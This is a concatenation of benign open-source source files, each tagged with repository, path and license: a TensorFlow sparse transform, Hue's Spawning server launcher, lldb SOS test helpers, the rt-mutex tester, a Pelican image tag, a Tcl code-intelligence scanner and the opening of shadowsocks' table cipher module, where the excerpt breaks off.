nr_motifs.append([])
nr_cells_with_motif.append([])
nr_strands_used = []
population_tracker = []
elongation_tracker = []
for time in xrange(numRounds):
for cell_iterator in xrange(numCells):
population.cells[cell_iterator].grow(elong,biaslist,maxStrandLength)
cell_to_divide = rand.sample(range(numCells),1)[0]
new_cell = population.cells[cell_to_divide].divide()
population.cells.append(new_cell)
population.cells = rand.sample(population.cells,numCells)
population.update_counters()
for index in xrange(len(motiflist)):
nr_motifs[index].append(copy(population.nr_motifs[index]))
nr_cells_with_motif[index].append(copy(population.nr_cells_with_motif[index]))
nr_strands_used.append(copy(population.nr_strands))
population_tracker_temp, elongation_tracker_temp = population.returncontents()
population_tracker.append(deepcopy(population_tracker_temp))
elongation_tracker.append(deepcopy(elongation_tracker_temp))
return nr_motifs, nr_strands_used, nr_cells_with_motif, population_tracker, elongation_tracker
|
mit
|
rvalyi/OpenUpgrade
|
addons/claim_from_delivery/__init__.py
|
374
|
1053
|
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_picking
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
laosiaudi/tensorflow
|
tensorflow/contrib/learn/python/learn/dataframe/transforms/sparsify.py
|
76
|
2727
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Transforms Dense to Sparse Tensor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.learn.python.learn.dataframe import transform
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
class Sparsify(transform.TensorFlowTransform):
"""Transforms Dense to Sparse Tensor."""
def __init__(self, strip_value):
super(Sparsify, self).__init__()
self._strip_value = strip_value
@transform.parameter
def strip_value(self):
return self._strip_value
@property
def name(self):
return "Sparsify"
@property
def input_valency(self):
return 1
@property
def _output_names(self):
return "output",
def _apply_transform(self, input_tensors, **kwargs):
"""Applies the transformation to the `transform_input`.
Args:
input_tensors: a list of Tensors representing the input to
the Transform.
**kwargs: Additional keyword arguments, unused here.
Returns:
A namedtuple of Tensors representing the transformed output.
"""
d = input_tensors[0]
if self.strip_value is np.nan:
strip_hot = math_ops.is_nan(d)
else:
strip_hot = math_ops.equal(d,
array_ops.constant([self.strip_value],
dtype=d.dtype))
keep_hot = math_ops.logical_not(strip_hot)
length = array_ops.reshape(array_ops.shape(d), [])
indices = array_ops.boolean_mask(math_ops.range(length), keep_hot)
values = array_ops.boolean_mask(d, keep_hot)
sparse_indices = array_ops.reshape(
math_ops.cast(indices, dtypes.int64), [-1, 1])
shape = math_ops.cast(array_ops.shape(d), dtypes.int64)
# pylint: disable=not-callable
return self.return_type(
sparse_tensor.SparseTensor(sparse_indices, values, shape))
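# Illustrative note, not part of the original module: applied to a dense rank-1
# column such as [1.0, 0.0, 3.0] with strip_value=0.0, the transform above
# keeps indices [[0], [2]] and values [1.0, 3.0], returning a SparseTensor with
# dense_shape [3]; the surrounding DataFrame plumbing is assumed here.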
|
apache-2.0
|
2013Commons/HUE-SHARK
|
desktop/core/src/desktop/management/commands/runspawningserver.py
|
2
|
4667
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import desktop.lib.eventlet_util
import logging
import os
import sys
from django.core.management.base import BaseCommand
from desktop import conf
import spawning.spawning_controller
from desktop.lib.daemon_utils import drop_privileges_if_necessary
from django.utils.translation import ugettext as _
SPAWNING_SERVER_HELP = r"""
Run Hue using the Spawning WSGI server in asynchronous mode.
"""
SPAWNING_SERVER_OPTIONS = {
'access_log_file': os.devnull,
'backdoor': None,
'chuid': None,
'coverage': None,
'daemonize': None,
'deadman_timeout': 1,
'factory': 'spawning.django_factory.config_factory',
'host': conf.HTTP_HOST.get(),
'max_age': None,
'max_memory': 0,
'no_keepalive': None,
'pidfile': None,
'port': conf.HTTP_PORT.get(),
'processes': 1,
'reload': None,
'restart_args': None,
'server_user': conf.SERVER_USER.get(),
'server_group': conf.SERVER_GROUP.get(),
'ssl_certificate': conf.SSL_CERTIFICATE.get(),
'ssl_private_key': conf.SSL_PRIVATE_KEY.get(),
'status_host': '',
'status_port': 0,
'stderr': None,
'stdout': None,
'sysinfo': None,
'threads': 0,
'verbose': None,
'watch': None
}
LOG = logging.getLogger(__name__)
class Command(BaseCommand):
help = _("Spawning Server for Hue.")
def handle(self, *args, **options):
from django.conf import settings
from django.utils import translation
if not conf.ENABLE_SERVER.get():
LOG.info("Hue is configured to not start its own web server.")
sys.exit(0)
# Activate the current language, because it won't get activated later.
try:
translation.activate(settings.LANGUAGE_CODE)
except AttributeError:
pass
runspawningserver()
def usage(self, subcommand):
return SPAWNING_SERVER_HELP
def runspawningserver():
try:
sock = spawning.spawning_controller.bind_socket(SPAWNING_SERVER_OPTIONS)
except Exception, ex:
LOG.error('Could not bind port %s: %s. Exiting' % (str(SPAWNING_SERVER_OPTIONS['port']), ex,))
return
drop_privileges_if_necessary(SPAWNING_SERVER_OPTIONS)
factory = SPAWNING_SERVER_OPTIONS['factory']
pos_args = ['desktop.settings']
argv_str_format = '--factory=%s %s --port %s -s %d -t %d'
argv_str = argv_str_format % (SPAWNING_SERVER_OPTIONS['factory'],
pos_args[0],
SPAWNING_SERVER_OPTIONS['port'],
SPAWNING_SERVER_OPTIONS['processes'],
SPAWNING_SERVER_OPTIONS['threads'])
factory_args = {
'access_log_file': SPAWNING_SERVER_OPTIONS['access_log_file'],
'args': pos_args,
'argv_str': argv_str,
'coverage': SPAWNING_SERVER_OPTIONS['coverage'],
'deadman_timeout': SPAWNING_SERVER_OPTIONS['deadman_timeout'],
'host': SPAWNING_SERVER_OPTIONS['host'],
'max_age' : SPAWNING_SERVER_OPTIONS['max_age'],
'no_keepalive' : SPAWNING_SERVER_OPTIONS['no_keepalive'],
'num_processes': SPAWNING_SERVER_OPTIONS['processes'],
'pidfile': SPAWNING_SERVER_OPTIONS['pidfile'],
'port': SPAWNING_SERVER_OPTIONS['port'],
'reload': SPAWNING_SERVER_OPTIONS['reload'],
'ssl_certificate': SPAWNING_SERVER_OPTIONS['ssl_certificate'],
'ssl_private_key': SPAWNING_SERVER_OPTIONS['ssl_private_key'],
'status_host': SPAWNING_SERVER_OPTIONS['status_host'] or SPAWNING_SERVER_OPTIONS['host'],
'status_port': SPAWNING_SERVER_OPTIONS['status_port'],
'sysinfo': SPAWNING_SERVER_OPTIONS['sysinfo'],
'threadpool_workers': SPAWNING_SERVER_OPTIONS['threads'],
'verbose': SPAWNING_SERVER_OPTIONS['verbose'],
'watch': SPAWNING_SERVER_OPTIONS['watch']
}
os.environ['HUE_SPAWNING'] = 'yes'
spawning.spawning_controller.start_controller(sock, factory, factory_args)
if __name__ == '__main__':
runspawningserver()
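# Illustrative note, not part of the original module: as a Django management
# command this is normally invoked through Hue's manage.py entry point
# (something like `hue runspawningserver`; the exact launcher name is an
# assumption), with host, port and SSL options taken from the desktop
# configuration read above.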
|
apache-2.0
|
theblacklion/pyglet
|
contrib/scene2d/tests/scene2d/VIEW_SUBWINDOW.py
|
29
|
1420
|
#!/usr/bin/env python
'''Testing flat map allow_oob enforcement.
Press 0-9 to set the size of the view in the window (1=10%, 0=100%)
Press arrow keys to move view focal point (little ball) around map.
Press "o" to turn allow_oob on and off.
You should see no black border with allow_oob=False.
Press escape or close the window to finish the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import unittest
from render_base import RenderBase
import scene2d
from pyglet.event import *
from pyglet.window.event import *
from pyglet.window import key
from scene2d.debug import gen_rect_map
class OOBTest(RenderBase):
def test_main(self):
self.init_window(256, 256)
self.set_map(gen_rect_map([[{}]*10]*10, 32, 32))
@event(self.w)
def on_text(text):
if text == 'o':
self.view.allow_oob = not self.view.allow_oob
print 'NOTE: allow_oob =', self.view.allow_oob
return
try:
size = int(25.6 * float(text))
if size == 0: size = 256
c = self.view.camera
c.width = c.height = size
c.x = c.y = (256-size)/2
except:
return EVENT_UNHANDLED
print 'NOTE: allow_oob =', self.view.allow_oob
self.show_focus()
self.run_test()
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
jrabbit/ubotu-fr
|
plugins/Format/config.py
|
15
|
2357
|
###
# Copyright (c) 2004, Jeremiah Fincher
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Format', True)
Format = conf.registerPlugin('Format')
# This is where your configuration variables (if any) should go. For example:
# conf.registerGlobalValue(Format, 'someConfigVariableName',
# registry.Boolean(False, """Help for someConfigVariableName."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79
|
bsd-3-clause
|
dostavro/dotfiles
|
sublime2/Packages/SublimeCodeIntel/libs/codeintel2/tclcile.py
|
2
|
8476
|
#!/usr/bin/env python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
#
# Contributors:
# Eric Promislow ([email protected])
"""
tclcile - a Code Intelligence Language Engine for the Tcl language
Module Usage:
from tclcile import scan_purelang
content = open("foo.tcl", "r").read()
scan_purelang(content, "foo.tcl")
Command-line Usage:
tclcile.py [<options>...] [<Tcl files>...]
Options:
-h, --help dump this help and exit
-V, --version dump this script's version and exit
-v, --verbose verbose output, use twice for more verbose output
-f, --filename <path> specify the filename of the file content
passed in on stdin, this is used for the "path"
attribute of the emitted <file> tag.
--md5=<string> md5 hash for the input
--mtime=<secs> modification time for output info, in #secs since
1/1/70.
-L, --language <name>
the language of the file being scanned
-c, --clock print timing info for scans (CIX is not printed)
One or more Tcl files can be specified as arguments or content can be
passed in on stdin. A directory can also be specified, in which case
all .tcl files in that directory are scanned.
This is a Language Engine for the Code Intelligence (codeintel) system.
Code Intelligence XML format. See:
http://specs.tl.activestate.com/kd/kd-0100.html
The command-line interface will return non-zero iff the scan failed.
"""
import os
from os.path import basename, splitext, isfile, isdir, join
import sys
import getopt
from hashlib import md5
import re
import logging
import glob
import time
import stat
from ciElementTree import Element, SubElement, tostring
from SilverCity import ScintillaConstants
from codeintel2 import tcl_lexer, tcl_parser
from codeintel2.common import CILEError
from codeintel2 import parser_cix
#---- exceptions
class TclCILEError(CILEError):
pass
#---- global data
_version_ = (0, 1, 0)
log = logging.getLogger("tclcile")
# log.setLevel(logging.DEBUG)
_gClockIt = 0 # if true then we are gathering timing data
_gClock = None # if gathering timing data this is set to time retrieval fn
_gStartTime = None # start time of current file being scanned
def scan_purelang(content, filename):
content = content.expandtabs(8)
tokenizer = tcl_lexer.TclLexer(content)
parser = tcl_parser.Parser(tokenizer, "Tcl")
parse_tree = parser.parse()
# XXX Change last arg from "Tcl" to "tclcile"?
tree = parser_cix.produce_elementTree_cix(parse_tree, filename, "Tcl",
"Tcl")
return tree
def scan_multilang(tokens, module_elem):
"""Build the Tcl module CIX element tree.
"tokens" is a generator of UDL tokens for this UDL-based
multi-lang document.
"module_elem" is the <module> element of a CIX element tree on
which the Tcl module should be built.
This should return a list of the CSL tokens in the token stream.
"""
tokenizer = tcl_lexer.TclMultiLangLexer(tokens)
parser = tcl_parser.Parser(tokenizer, "AOL") # TODO: What is AOL here?
parse_tree = parser.parse()
parser_cix.produce_elementTree_contents_cix(parse_tree, module_elem)
csl_tokens = tokenizer.get_csl_tokens()
return csl_tokens
#---- mainline
def main(argv):
logging.basicConfig()
# Parse options.
try:
opts, args = getopt.getopt(argv[1:], "Vvhf:cL:",
["version", "verbose", "help", "filename=", "md5=", "mtime=",
"clock", "language="])
except getopt.GetoptError, ex:
log.error(str(ex))
log.error("Try `tclcile --help'.")
return 1
numVerboses = 0
stdinFilename = None
md5sum = None
mtime = None
lang = "Tcl"
global _gClockIt
for opt, optarg in opts:
if opt in ("-h", "--help"):
sys.stdout.write(__doc__)
return
elif opt in ("-V", "--version"):
ver = '.'.join([str(part) for part in _version_])
print "tclcile %s" % ver
return
elif opt in ("-v", "--verbose"):
numVerboses += 1
if numVerboses == 1:
log.setLevel(logging.INFO)
else:
log.setLevel(logging.DEBUG)
elif opt in ("-f", "--filename"):
stdinFilename = optarg
elif opt in ("-L", "--language"):
lang = optarg
elif opt in ("--md5",):
md5sum = optarg
elif opt in ("--mtime",):
mtime = optarg
elif opt in ("-c", "--clock"):
_gClockIt = 1
global _gClock
if sys.platform.startswith("win"):
_gClock = time.clock
else:
_gClock = time.time
if len(args) == 0:
contentOnStdin = 1
filenames = [stdinFilename or "<stdin>"]
else:
contentOnStdin = 0
paths = []
for arg in args:
paths += glob.glob(arg)
filenames = []
for path in paths:
if isfile(path):
filenames.append(path)
elif isdir(path):
tclfiles = [join(path, n) for n in os.listdir(path)
if splitext(n)[1] == ".tcl"]
tclfiles = [f for f in tclfiles if isfile(f)]
filenames += tclfiles
try:
for filename in filenames:
if contentOnStdin:
log.debug("reading content from stdin")
content = sys.stdin.read()
log.debug("finished reading content from stdin")
if mtime is None:
mtime = int(time.time())
else:
if mtime is None:
mtime = int(os.stat(filename)[stat.ST_MTIME])
content = open(filename, 'r').read()
if _gClockIt:
sys.stdout.write("scanning '%s'..." % filename)
global _gStartTime
_gStartTime = _gClock()
data = tostring(scan_purelang(content, filename))
if _gClockIt:
sys.stdout.write(" %.3fs\n" % (_gClock()-_gStartTime))
elif data:
sys.stdout.write(data)
except KeyboardInterrupt:
log.debug("user abort")
return 1
if 0: # except Exception, ex:
log.error(str(ex))
if log.isEnabledFor(logging.DEBUG):
print
import traceback
traceback.print_exception(*sys.exc_info())
return 1
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
mit
|
ruben-ayrapetyan/coreclr
|
src/ToolBox/SOS/tests/testutils.py
|
43
|
5438
|
from __future__ import print_function
import lldb
import re
import inspect
import sys
import os
import importlib
summary_file = ''
fail_flag = ''
failed = False
def assertCommon(passed, fatal):
global failed
with open(summary_file, 'a+') as summary:
print(bool(passed), file=summary)
if (not passed):
failed = True
print('!!! test failed:', file=summary)
for s in inspect.stack()[2:]:
print("!!! %s:%i" % (s[1], s[2]), file=summary)
print("!!! %s" % s[4][0], file=summary)
if re.match('\W*t_\w+\.py$', s[1]):
break
print('!!! ', file=summary)
if fatal:
exit(1)
def assertTrue(x, fatal=True):
passed = bool(x)
assertCommon(passed, fatal)
def assertFalse(x, fatal=True):
passed = not bool(x)
assertCommon(passed, fatal)
def assertEqual(x, y, fatal=True):
passed = (x == y)
if not passed:
print(str(x), ' != ', str(y))
assertCommon(passed, fatal)
def assertNotEqual(x, y, fatal=True):
passed = (x != y)
if not passed:
print(str(x), ' == ', str(y))
assertCommon(passed, fatal)
def checkResult(res):
if not res.Succeeded():
print(res.GetOutput())
print(res.GetError())
exit(1)
def is_hexnum(s):
try:
int(s, 16)
return True
except ValueError:
return False
def exec_and_find(commandInterpreter, cmd, regexp):
res = lldb.SBCommandReturnObject()
commandInterpreter.HandleCommand(cmd, res)
checkResult(res)
expr = re.compile(regexp)
addr = None
print(res.GetOutput())
lines = res.GetOutput().splitlines()
for line in lines:
match = expr.match(line)
if match:
addr = match.group(1)
break
print("Found addr: " + str(addr))
return addr
def stop_in_main(debugger, assembly):
ci = debugger.GetCommandInterpreter()
target = debugger.GetSelectedTarget()
process = target.GetProcess()
res = lldb.SBCommandReturnObject()
# The process must be stopped here while libcoreclr is loading.
# This test usually fails on release builds of coreclr
# since we depend on the 'LoadLibraryExW' symbol being present.
assertEqual(process.GetState(), lldb.eStateStopped)
# The reason of this stop must be a breakpoint
assertEqual(process.GetSelectedThread().GetStopReason(),
lldb.eStopReasonBreakpoint)
ci.HandleCommand("bpmd " + assembly + " Test.Main", res)
out_msg = res.GetOutput()
err_msg = res.GetError()
print(res.GetOutput())
print(res.GetError())
# The interpreter must have this command and be able to run it
assertTrue(res.Succeeded())
# Output is not empty
# Should be at least 'Adding pending breakpoints...'
assertTrue(len(out_msg) > 0)
# Error message is empty
assertTrue(len(err_msg) == 0)
process.Continue()
# Process must be stopped here if bpmd works at all
assertEqual(process.GetState(), lldb.eStateStopped)
# The reason of this stop must be a breakpoint
assertEqual(process.GetSelectedThread().GetStopReason(),
lldb.eStopReasonBreakpoint)
def exit_lldb(debugger, assembly):
ci = debugger.GetCommandInterpreter()
target = debugger.GetSelectedTarget()
process = target.GetProcess()
res = lldb.SBCommandReturnObject()
ci.HandleCommand("breakpoint delete --force", res)
out_msg = res.GetOutput()
err_msg = res.GetError()
print(out_msg)
print(err_msg)
# The interpreter must have this command and be able to run it
# assertTrue(res.Succeeded())
process.Continue()
# Process must exit
assertEqual(process.GetState(), lldb.eStateExited)
# Process must exit with zero code
assertEqual(process.GetExitStatus(), 0)
def get_methoddesc(debugger, assembly, funcname):
ci = debugger.GetCommandInterpreter()
target = debugger.GetSelectedTarget()
process = target.GetProcess()
res = lldb.SBCommandReturnObject()
ci.HandleCommand("name2ee %s %s" % (assembly, funcname), res)
print(res.GetOutput())
print(res.GetError())
# The interpreter must have this command and be able to run it
assertTrue(res.Succeeded())
output = res.GetOutput()
# Output is not empty
assertTrue(len(output) > 0)
match = re.search('MethodDesc:\s+([0-9a-fA-F]+)', output)
# Line matched
assertTrue(match)
groups = match.groups()
# Match has a single subgroup
assertEqual(len(groups), 1)
md_addr = groups[0]
# Address must be a hex number
assertTrue(is_hexnum(md_addr))
return md_addr
def run(assembly, module):
with open(summary_file, 'a+') as summary:
print('new_suite: %s' % module, file=summary)
debugger = lldb.debugger
debugger.SetAsync(False)
target = lldb.target
debugger.HandleCommand("breakpoint set --one-shot --name coreclr_execute_assembly")
debugger.HandleCommand("process launch")
# run the scenario
print("starting scenario...")
i = importlib.import_module(module)
scenarioResult = i.runScenario(os.path.basename(assembly), debugger,
target)
if (target.GetProcess().GetExitStatus() == 0) and not failed:
os.unlink(fail_flag)
with open(summary_file, 'a+') as summary:
print('Completed!', file=summary)
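# Illustrative sketch, not part of the original module: run() above expects the
# scenario module (named t_*.py, per the pattern matched in assertCommon) to
# expose a runScenario(assembly, debugger, target) callable. The body below is
# a hypothetical example built only from helpers defined in this file:
#     def runScenario(assembly, debugger, target):
#         stop_in_main(debugger, assembly)
#         md = get_methoddesc(debugger, assembly, "Test.Main")
#         assertTrue(is_hexnum(md))
#         exit_lldb(debugger, assembly)
#         return True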
|
mit
|
sbreen94/Zeus_D2vzw
|
scripts/rt-tester/rt-tester.py
|
11005
|
5307
|
#!/usr/bin/python
#
# rt-mutex tester
#
# (C) 2006 Thomas Gleixner <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
import os
import sys
import getopt
import shutil
import string
# Globals
quiet = 0
test = 0
comments = 0
sysfsprefix = "/sys/devices/system/rttest/rttest"
statusfile = "/status"
commandfile = "/command"
# Command opcodes
cmd_opcodes = {
"schedother" : "1",
"schedfifo" : "2",
"lock" : "3",
"locknowait" : "4",
"lockint" : "5",
"lockintnowait" : "6",
"lockcont" : "7",
"unlock" : "8",
"signal" : "11",
"resetevent" : "98",
"reset" : "99",
}
test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
|
gpl-2.0
|
s40523222/2016fallcp_hw
|
plugin/liquid_tags/img.py
|
26
|
2465
|
"""
Image Tag
---------
This implements a Liquid-style image tag for Pelican,
based on the octopress image tag [1]_
Syntax
------
{% img [class name(s)] [http[s]:/]/path/to/image [width [height]] [title text | "title text" ["alt text"]] %}
Examples
--------
{% img /images/ninja.png Ninja Attack! %}
{% img left half http://site.com/images/ninja.png Ninja Attack! %}
{% img left half http://site.com/images/ninja.png 150 150 "Ninja Attack!" "Ninja in attack posture" %}
Output
------
<img src="/images/ninja.png">
<img class="left half" src="http://site.com/images/ninja.png" title="Ninja Attack!" alt="Ninja Attack!">
<img class="left half" src="http://site.com/images/ninja.png" width="150" height="150" title="Ninja Attack!" alt="Ninja in attack posture">
[1] https://github.com/imathis/octopress/blob/master/plugins/image_tag.rb
"""
import re
from .mdx_liquid_tags import LiquidTags
import six
SYNTAX = '{% img [class name(s)] [http[s]:/]/path/to/image [width [height]] [title text | "title text" ["alt text"]] %}'
# Regular expression to match the entire syntax
ReImg = re.compile("""(?P<class>\S.*\s+)?(?P<src>(?:https?:\/\/|\/|\S+\/)\S+)(?:\s+(?P<width>\d+))?(?:\s+(?P<height>\d+))?(?P<title>\s+.+)?""")
# Regular expression to split the title and alt text
ReTitleAlt = re.compile("""(?:"|')(?P<title>[^"']+)?(?:"|')\s+(?:"|')(?P<alt>[^"']+)?(?:"|')""")
@LiquidTags.register('img')
def img(preprocessor, tag, markup):
attrs = None
# Parse the markup string
match = ReImg.search(markup)
if match:
attrs = dict([(key, val.strip())
for (key, val) in six.iteritems(match.groupdict()) if val])
else:
raise ValueError('Error processing input. '
'Expected syntax: {0}'.format(SYNTAX))
# Check if alt text is present -- if so, split it from title
if 'title' in attrs:
match = ReTitleAlt.search(attrs['title'])
if match:
attrs.update(match.groupdict())
if not attrs.get('alt'):
attrs['alt'] = attrs['title']
# Return the formatted text
return "<img {0}>".format(' '.join('{0}="{1}"'.format(key, val)
for (key, val) in six.iteritems(attrs)))
#----------------------------------------------------------------------
# This import allows image tag to be a Pelican plugin
from .liquid_tags import register
|
agpl-3.0
|
naturs/shadowsocks
|
shadowsocks/crypto/table.py
|
1044
|
8108
|
#!/usr/bin/env python
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import string
import struct
import hashlib
__all__ = ['ciphers']
cached_tables = {}
if hasattr(string, 'maketrans'):
maketrans = string.maketrans
translate = string.translate
else:
maketrans = bytes.maketrans
translate = bytes.translate
def get_table(key):
m = hashlib.md5()
m.update(key)
s = m.digest()
a, b = struct.unpack('<QQ', s)
table = maketrans(b'', b'')
table = [table[i: i + 1] for i in range(len(table))]
for i in range(1, 1024):
table.sort(key=lambda x: int(a % (ord(x) + i)))
return table
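# Illustrative note, not part of the original module: get_table() derives a
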